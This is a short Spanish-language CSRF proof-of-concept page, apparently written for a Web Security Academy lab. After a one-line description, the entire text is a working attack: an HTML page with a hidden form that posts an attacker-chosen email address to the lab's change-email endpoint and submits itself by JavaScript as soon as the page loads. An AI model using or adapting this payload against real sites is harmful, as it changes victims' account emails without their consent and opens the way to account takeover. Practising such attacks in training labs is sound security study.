PAYLOAD que CON yavascript provoca solo el envio involuntario del cambio de mail por la victima:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>P4IM0N-CSRF</title>
</head>
<body>
<h1>¡Ataque P4IM0N-CSRF!</h1>
<form action="https://0a8100d104f324c982ec70c4002500a5.web-security-academy.net/my-account/change-
email" method="POST">
<input type="hidden" name="email" value="malisiosoP4IM0Nmalisioso@hotmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>